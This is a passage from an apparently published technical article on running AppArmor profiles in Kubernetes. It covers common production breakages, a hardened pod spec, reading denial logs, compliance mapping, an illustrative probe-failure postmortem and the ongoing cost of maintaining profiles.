&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fswm77afxbepg1wixkpg7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fswm77afxbepg1wixkpg7.png" alt="image" width="800" height="247"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Note that attack vector 2 is only blocked if you've explicitly added &lt;code&gt;deny @{PROC}/*/maps r&lt;/code&gt; to your profile. Many &lt;code&gt;RuntimeDefault&lt;/code&gt; profiles do not include this denial. This is a good example of why "we have AppArmor" and "we have AppArmor enforcing what we think it is" are different claims.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  What Breaks First in Production
&lt;/h2&gt;

&lt;p&gt;Theory is necessary. Operational experience is different. Here's what actually causes profile-related incidents:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Java and JVM workloads&lt;/strong&gt; write to unexpected temp paths at startup — often derived from system properties and JDK version. A profile tight enough to deny &lt;code&gt;/tmp/hsperfdata_*&lt;/code&gt; will break JVM health checks. Generate profiles from running workloads, not from documentation.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Dynamic language runtimes&lt;/strong&gt; (Python, Ruby, Node.js) load shared libraries and modules from paths that vary by distribution and package version. &lt;code&gt;/usr/lib/x86_64-linux-gnu/**&lt;/code&gt; may need to be explicitly allowed, and that path is distribution-specific.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Sidecars accessing shared volumes&lt;/strong&gt;: If your app container and a sidecar (e.g., an Envoy proxy or log shipper) share an &lt;code&gt;emptyDir&lt;/code&gt;, both containers need profiles that permit access to that volume's underlying path. The actual path under &lt;code&gt;/var/lib/kubelet/pods/&lt;/code&gt; is unpredictable — use &lt;code&gt;@{run}&lt;/code&gt; and path globs carefully, or use a dedicated volume mount path that's consistent.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Health and readiness probes&lt;/strong&gt;: Kubernetes exec probes run inside the container's process namespace. If your probe invokes &lt;code&gt;/bin/sh&lt;/code&gt; or &lt;code&gt;/bin/curl&lt;/code&gt; and your profile restricts shell execution, probes will fail. Either allow the probe binary explicitly or switch to HTTP/TCP probes that don't require exec.&lt;/p&gt;
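
&lt;p&gt;As a sketch (the port and path here are illustrative, not from any spec above), switching an exec probe to &lt;code&gt;httpGet&lt;/code&gt; removes the shell from the equation entirely:&lt;/p&gt;

```yaml
# Instead of exec'ing /bin/sh + curl inside the container, let the kubelet
# probe the app over HTTP. No process is spawned under the profile, so
# there is nothing for AppArmor or seccomp to deny.
readinessProbe:
  httpGet:
    path: /healthz   # illustrative endpoint
    port: 8080       # illustrative port
  periodSeconds: 10
```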

&lt;p&gt;&lt;strong&gt;Profile load ordering on node startup&lt;/strong&gt;: If a node reboots and the SPO pod hasn't yet reconciled profiles before a workload pod schedules, the workload pod may fail admission. Build node readiness checks that verify profile presence, or use pod disruption budgets and node cordoning during maintenance windows.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Performance Considerations
&lt;/h2&gt;

&lt;p&gt;AppArmor's overhead is generally low, but not zero, and it scales with profile complexity.&lt;/p&gt;

&lt;p&gt;The cost is incurred at &lt;strong&gt;file open, exec, and network operations&lt;/strong&gt; — each requires an LSM hook traversal and a policy lookup. For most workloads, this is imperceptible. For workloads doing high-frequency file I/O (logging pipelines, database engines, build systems), a dense profile with many path rules can add measurable latency to path lookups.&lt;/p&gt;

&lt;p&gt;Practical guidance: keep profiles focused. A profile with 20 precise rules is faster and easier to audit than one with 200 broad globs. Avoid &lt;code&gt;/**&lt;/code&gt; catch-alls on performance-sensitive paths — use specific subtree rules. And in complain mode, audit noise from high-frequency deny events can itself affect throughput; don't leave workloads in complain mode indefinitely.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  A Production-Grade Pod Spec
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Pod&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;hardened-app&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;production&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;automountServiceAccountToken&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;false&lt;/span&gt;  &lt;span class="c1"&gt;# disable default SA token mount — most pods don't need API access&lt;/span&gt;
  &lt;span class="na"&gt;securityContext&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;                     &lt;span class="c1"&gt;# pod-level: applies to all containers&lt;/span&gt;
    &lt;span class="na"&gt;runAsNonRoot&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;                 &lt;span class="c1"&gt;# kubelet rejects the pod if the image runs as UID 0&lt;/span&gt;
    &lt;span class="na"&gt;runAsUser&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;1001&lt;/span&gt;                    &lt;span class="c1"&gt;# explicit UID — avoid root (0) and well-known service UIDs&lt;/span&gt;
    &lt;span class="na"&gt;runAsGroup&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;1001&lt;/span&gt;                   &lt;span class="c1"&gt;# primary GID for the process&lt;/span&gt;
    &lt;span class="na"&gt;fsGroup&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;1001&lt;/span&gt;                      &lt;span class="c1"&gt;# volume files are chowned to this GID on mount&lt;/span&gt;
    &lt;span class="na"&gt;seccompProfile&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;RuntimeDefault&lt;/span&gt;             &lt;span class="c1"&gt;# use the container runtime's built-in seccomp profile (~44 blocked syscalls)&lt;/span&gt;
                                       &lt;span class="c1"&gt;# move to Localhost + custom profile for high-security workloads&lt;/span&gt;
  &lt;span class="na"&gt;containers&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;app&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;my-org/app:1.4.2&lt;/span&gt;           &lt;span class="c1"&gt;# pin to digest in production; tags are mutable&lt;/span&gt;
    &lt;span class="na"&gt;securityContext&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;                   &lt;span class="c1"&gt;# container-level: overrides pod-level where both exist&lt;/span&gt;
      &lt;span class="na"&gt;appArmorProfile&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Localhost&lt;/span&gt;                &lt;span class="c1"&gt;# use a node-loaded custom profile, not RuntimeDefault&lt;/span&gt;
        &lt;span class="na"&gt;localhostProfile&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;my-org/app-v1&lt;/span&gt;  &lt;span class="c1"&gt;# path relative to /etc/apparmor.d/ — must be loaded by SPO before pod starts&lt;/span&gt;
      &lt;span class="na"&gt;allowPrivilegeEscalation&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;false&lt;/span&gt;  &lt;span class="c1"&gt;# prevents setuid binaries and sudo from granting more privilege than the parent&lt;/span&gt;
      &lt;span class="na"&gt;readOnlyRootFilesystem&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;     &lt;span class="c1"&gt;# container filesystem is immutable — writes go only to explicit volume mounts&lt;/span&gt;
      &lt;span class="na"&gt;capabilities&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;drop&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;ALL&lt;/span&gt;                          &lt;span class="c1"&gt;# drop every capability Linux grants by default&lt;/span&gt;
        &lt;span class="na"&gt;add&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;NET_BIND_SERVICE&lt;/span&gt;             &lt;span class="c1"&gt;# re-add only if binding to ports &amp;lt; 1024; remove if app uses port &amp;gt;= 1024&lt;/span&gt;
    &lt;span class="na"&gt;volumeMounts&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;tmp&lt;/span&gt;
      &lt;span class="na"&gt;mountPath&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/tmp&lt;/span&gt;                  &lt;span class="c1"&gt;# writable scratch space — required by many runtimes even under readOnlyRootFilesystem&lt;/span&gt;
    &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;cache&lt;/span&gt;
      &lt;span class="na"&gt;mountPath&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/var/cache/app&lt;/span&gt;        &lt;span class="c1"&gt;# app-specific writable path; scope this as narrowly as possible&lt;/span&gt;
  &lt;span class="na"&gt;volumes&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;tmp&lt;/span&gt;
    &lt;span class="na"&gt;emptyDir&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;{}&lt;/span&gt;                       &lt;span class="c1"&gt;# ephemeral, node-local; wiped on pod restart — not for persistent data&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;cache&lt;/span&gt;
    &lt;span class="na"&gt;emptyDir&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;{}&lt;/span&gt;                       &lt;span class="c1"&gt;# same — both volumes exist only to satisfy readOnlyRootFilesystem&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;A few non-obvious choices: &lt;code&gt;automountServiceAccountToken: false&lt;/code&gt; removes the default credential most pods get but rarely need. The &lt;code&gt;emptyDir&lt;/code&gt; volumes provide writable space within a &lt;code&gt;readOnlyRootFilesystem: true&lt;/code&gt; constraint — without them, many runtimes crash on startup trying to write to &lt;code&gt;/tmp&lt;/code&gt;. Drop ALL capabilities and add back only what's needed; &lt;code&gt;NET_BIND_SERVICE&lt;/code&gt; is the only one most web services require.&lt;/p&gt;

&lt;p&gt;Note also what &lt;code&gt;Restricted&lt;/code&gt; PSS enforces at admission: if &lt;code&gt;appArmorProfile&lt;/code&gt; is set, it must be &lt;code&gt;RuntimeDefault&lt;/code&gt; or &lt;code&gt;Localhost&lt;/code&gt;, but PSS does &lt;strong&gt;not&lt;/strong&gt; validate the strength or content of the referenced profile. Admission compliance and actual security posture are not the same thing.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Observability: Catching Denials Before They Become Incidents
&lt;/h2&gt;

&lt;p&gt;AppArmor logs to the kernel audit subsystem:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Live denial stream&lt;/span&gt;
journalctl &lt;span class="nt"&gt;-k&lt;/span&gt; &lt;span class="nt"&gt;-f&lt;/span&gt; | &lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="s1"&gt;'apparmor="DENIED"'&lt;/span&gt;

&lt;span class="c"&gt;# Example denial entry&lt;/span&gt;
kernel: audit: &lt;span class="nb"&gt;type&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;1400 audit&lt;span class="o"&gt;(&lt;/span&gt;1708012345.123:42&lt;span class="o"&gt;)&lt;/span&gt;: &lt;span class="nv"&gt;apparmor&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"DENIED"&lt;/span&gt;
  &lt;span class="nv"&gt;operation&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"open"&lt;/span&gt; &lt;span class="nv"&gt;profile&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"my-org/app-v1"&lt;/span&gt;
  &lt;span class="nv"&gt;name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"/proc/1/maps"&lt;/span&gt; &lt;span class="nv"&gt;pid&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;12345 &lt;span class="nb"&gt;comm&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"sh"&lt;/span&gt; &lt;span class="nv"&gt;requested_mask&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"r"&lt;/span&gt;
  &lt;span class="nv"&gt;denied_mask&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"r"&lt;/span&gt; &lt;span class="nv"&gt;fsuid&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;1001 &lt;span class="nv"&gt;ouid&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;0
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Distinguishing seccomp denials from AppArmor denials&lt;/strong&gt; is a practical skill that gets skipped in documentation. They surface differently:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;&lt;/th&gt;
&lt;th&gt;Seccomp denial&lt;/th&gt;
&lt;th&gt;AppArmor denial&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Syscall result&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;EPERM&lt;/code&gt; or &lt;code&gt;ENOSYS&lt;/code&gt; (configurable)&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;EACCES&lt;/code&gt; (access denied)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Kernel log&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;None by default (use &lt;code&gt;SCMP_ACT_LOG&lt;/code&gt; to enable)&lt;/td&gt;
&lt;td&gt;Visible in &lt;code&gt;dmesg&lt;/code&gt; and audit log immediately&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Log format&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;No &lt;code&gt;apparmor=&lt;/code&gt; field; entries appear only if the &lt;code&gt;SCMP_ACT_LOG&lt;/code&gt; action is used&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;apparmor="DENIED"&lt;/code&gt; with &lt;code&gt;operation&lt;/code&gt;, &lt;code&gt;profile&lt;/code&gt;, &lt;code&gt;name&lt;/code&gt;, &lt;code&gt;comm&lt;/code&gt; fields&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;How to distinguish&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Application sees &lt;code&gt;EPERM&lt;/code&gt; but nothing appears in &lt;code&gt;journalctl -k | grep apparmor&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Denial line with &lt;code&gt;apparmor="DENIED"&lt;/code&gt; appears in the kernel log at the moment of failure&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;When a container fails with &lt;code&gt;Operation not permitted&lt;/code&gt; and you see nothing in the AppArmor audit log, seccomp is the likely culprit. During profiling, set &lt;code&gt;SCMP_ACT_LOG&lt;/code&gt; as the action for syscalls not explicitly allowed so they surface in the audit log; the Security Profiles Operator's &lt;code&gt;--record&lt;/code&gt; mode does this automatically.&lt;/p&gt;

&lt;p&gt;The &lt;code&gt;operation&lt;/code&gt;, &lt;code&gt;profile&lt;/code&gt;, &lt;code&gt;name&lt;/code&gt;, and &lt;code&gt;comm&lt;/code&gt; fields tell you exactly what was denied, by which profile, from which binary. When a denial fires, the triage path matters:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fss0wbd722eleuzc6ft6d.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fss0wbd722eleuzc6ft6d.png" alt="image" width="800" height="1124"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;A denial from a known binary hitting a path the app shouldn't need is a high-fidelity signal; treat it as an incident until proven otherwise. Feed these logs into your SIEM (Security Information and Event Management) with a volume-based alert on denials from any single pod.&lt;/p&gt;
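
&lt;p&gt;Extracting those fields is a one-regex job. A hypothetical parser sketch (the field layout follows the denial entry shown earlier; adapt the pattern to your log pipeline):&lt;/p&gt;

```python
import re

# Pull the key fields out of an AppArmor denial line before shipping it to
# the SIEM. Matches the audit format shown above; groups are, in order:
# operation, profile, name (the denied object), comm (the binary).
DENIAL_RE = re.compile(
    r'apparmor="DENIED"'
    r'.*?operation="([^"]+)"'
    r'.*?profile="([^"]+)"'
    r'.*?name="([^"]+)"'
    r'.*?comm="([^"]+)"',
    re.S,
)

def parse_denial(line):
    m = DENIAL_RE.search(line)
    if m is None:
        return None
    keys = ("operation", "profile", "name", "comm")
    return dict(zip(keys, m.groups()))

line = ('audit: type=1400 audit(1708012345.123:42): apparmor="DENIED" '
        'operation="open" profile="my-org/app-v1" name="/proc/1/maps" '
        'pid=12345 comm="sh" requested_mask="r" denied_mask="r"')
print(parse_denial(line))
# {'operation': 'open', 'profile': 'my-org/app-v1', 'name': '/proc/1/maps', 'comm': 'sh'}
```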




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Compliance Mapping
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Control&lt;/th&gt;
&lt;th&gt;Standard&lt;/th&gt;
&lt;th&gt;Requirement&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Mandatory Access Control&lt;/td&gt;
&lt;td&gt;CIS Kubernetes Benchmark 5.7.4&lt;/td&gt;
&lt;td&gt;Apply security context to pods/containers&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Least privilege file access&lt;/td&gt;
&lt;td&gt;NIST SP 800-190 §4.3.1&lt;/td&gt;
&lt;td&gt;Limit container runtime privileges&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Restrict kernel capabilities&lt;/td&gt;
&lt;td&gt;PCI DSS v4 Req 6.4&lt;/td&gt;
&lt;td&gt;Protect systems from known vulnerabilities&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Restrict syscall surface&lt;/td&gt;
&lt;td&gt;SOC 2 CC6.1&lt;/td&gt;
&lt;td&gt;Logical access controls&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Pod Security Standards (Restricted)&lt;/td&gt;
&lt;td&gt;Kubernetes native&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;appArmorProfile&lt;/code&gt;, if set, must be &lt;code&gt;RuntimeDefault&lt;/code&gt; or &lt;code&gt;Localhost&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;Note the gap: compliance frameworks check for the presence of controls, not their effectiveness. PSS &lt;code&gt;Restricted&lt;/code&gt; enforces that a profile is declared, not that it actually restricts anything meaningful. That's your team's responsibility to close.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  A Realistic Failure Postmortem
&lt;/h2&gt;

&lt;p&gt;Understanding where AppArmor goes wrong in practice is as important as knowing how to configure it. Here's a failure mode that plays out more often than it should.&lt;/p&gt;

&lt;p&gt;A platform team deploys a new microservice to production. They've done the right things: a custom &lt;code&gt;Localhost&lt;/code&gt; profile, authored from SPO's recorded output in staging, reviewed and tightened before go-live. The deployment succeeds. Pods are running. And then, three hours later, the kubelet starts restarting containers because their exec liveness probes are failing.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffm2b0k8ayhi1s7il1euj.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffm2b0k8ayhi1s7il1euj.png" alt="image" width="800" height="398"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What went wrong:&lt;/strong&gt; The profile was generated from the application process's behavior, but exec probes spawn a separate shell inside the container that the profiling run never observed. The profile correctly represented the app — but not all the processes Kubernetes would run inside it.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The compounding failure:&lt;/strong&gt; Under pressure at 2am, the team set &lt;code&gt;type: Unconfined&lt;/code&gt; and moved on. That pod has been running without AppArmor enforcement for six months. Nobody notices because it's not visible in normal kubectl output.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The systemic lesson:&lt;/strong&gt; The root issue was not the profile itself — it was the rollout process. Security controls fail most often during deployment, not during steady-state operation. The failure mode is predictable: profiles generated from synthetic or incomplete observation windows miss edge cases, and the incident-response path of least resistance is to disable the control entirely.&lt;/p&gt;

&lt;p&gt;Treat AppArmor enforcement like any other breaking infrastructure change: progressive rollout, canary namespaces, and automated rollback to complain mode — not to &lt;code&gt;Unconfined&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The right rollout strategy:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Deploy to a canary namespace with the profile in &lt;strong&gt;complain mode&lt;/strong&gt; first (&lt;code&gt;flags=(complain)&lt;/code&gt;), even if you generated it from production traffic.&lt;/li&gt;
&lt;li&gt;Monitor denials for 24–48 hours across all probe types, init containers, and sidecar interactions.&lt;/li&gt;
&lt;li&gt;Promote to enforce mode only after the denial stream is clean.&lt;/li&gt;
&lt;li&gt;If enforcement causes an incident, roll back to complain mode — never to &lt;code&gt;Unconfined&lt;/code&gt;. Complain mode preserves the security signal while restoring service.&lt;/li&gt;
&lt;li&gt;Treat a post-incident &lt;code&gt;Unconfined&lt;/code&gt; pod as technical debt with a ticket, not a resolved incident.&lt;/li&gt;
&lt;/ol&gt;
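
&lt;p&gt;For step 1, complain mode is set in the profile header itself (profile name illustrative); the rules stay identical between complain and enforce, so promotion is a one-line change:&lt;/p&gt;

```
# Complain mode: violations are logged (apparmor="ALLOWED" in the audit
# log) but not blocked. Drop the flag to promote to enforce mode.
profile my-org.app-v1 flags=(complain) {
  # ...rules unchanged from the enforce-mode version...
}
```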

&lt;p&gt;The lesson isn't that AppArmor is fragile. It's that profile coverage must be validated against everything the kernel will run in a container, not just the application binary.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  AppArmor's Threat Model Boundary
&lt;/h2&gt;

&lt;p&gt;AppArmor is a meaningful control within a specific set of assumptions. Outside those assumptions, it provides weaker or no protection. Being explicit about this boundary is what separates operational security from security theater.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F88btah5f3vjzd09ytrpd.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F88btah5f3vjzd09ytrpd.png" alt="image" width="800" height="1984"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The most common way these assumptions break silently in real clusters:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;A team runs a debug container with &lt;code&gt;privileged: true&lt;/code&gt; to diagnose an incident and never removes it.&lt;/li&gt;
&lt;li&gt;A legacy workload requires &lt;code&gt;hostPath&lt;/code&gt; mounts that weren't caught in policy review.&lt;/li&gt;
&lt;li&gt;A node autoscaler provisions a new node type whose image doesn't have the SPO-managed profiles loaded.&lt;/li&gt;
&lt;li&gt;An operator chart sets &lt;code&gt;appArmorProfile: type: Unconfined&lt;/code&gt; for convenience during development and the override is never removed before promotion.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;None of these are AppArmor failures. They're assumption violations. The control is only as strong as the assumptions underneath it — which is why security posture reviews should explicitly verify these preconditions, not just check that the field is set.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  The Operational Cost of AppArmor
&lt;/h2&gt;

&lt;p&gt;The real cost of AppArmor is not performance overhead — it's policy maintenance.&lt;/p&gt;

&lt;p&gt;Every &lt;code&gt;Localhost&lt;/code&gt; profile you deploy becomes part of your platform's API surface. Applications depend on it. Admission controllers enforce its presence. And unlike most Kubernetes configuration, profile changes can silently break applications in ways that only surface under specific runtime conditions.&lt;/p&gt;

&lt;p&gt;The ongoing maintenance surface that teams underestimate:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Profile lifecycle management&lt;/strong&gt; — profiles must be versioned, reviewed, and retired as applications evolve. A profile that was accurate at authoring time may be wrong after a dependency upgrade or JDK version change.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Runtime compatibility&lt;/strong&gt; — when containerd or CRI-O ships a new version, default behavior can shift. Profiles that relied on implicit runtime behavior may need updates.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Sidecar and probe coverage&lt;/strong&gt; — every new sidecar (Envoy, log shipper, OTel collector) added to a namespace needs its own profile or must be explicitly covered. Forgetting this is how &lt;code&gt;Unconfined&lt;/code&gt; exceptions accumulate.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Exception management under pressure&lt;/strong&gt; — during incidents, the fastest resolution is always to disable the control. Without a clear policy on what constitutes a legitimate exception (and a process for revisiting it), profiles erode over time.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Without automation — SPO for lifecycle, GitOps for change tracking, SIEM alerts for denial spikes — AppArmor deployments tend to degrade into one of two failure modes: overly permissive profiles that allow nearly everything, or growing lists of &lt;code&gt;Unconfined&lt;/code&gt; exceptions added during incidents and never revisited.&lt;/p&gt;

&lt;p&gt;The question for platform teams is not "should we use AppArmor?" but "do we have the operational infrastructure to maintain it at the security level it needs to operate?"&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
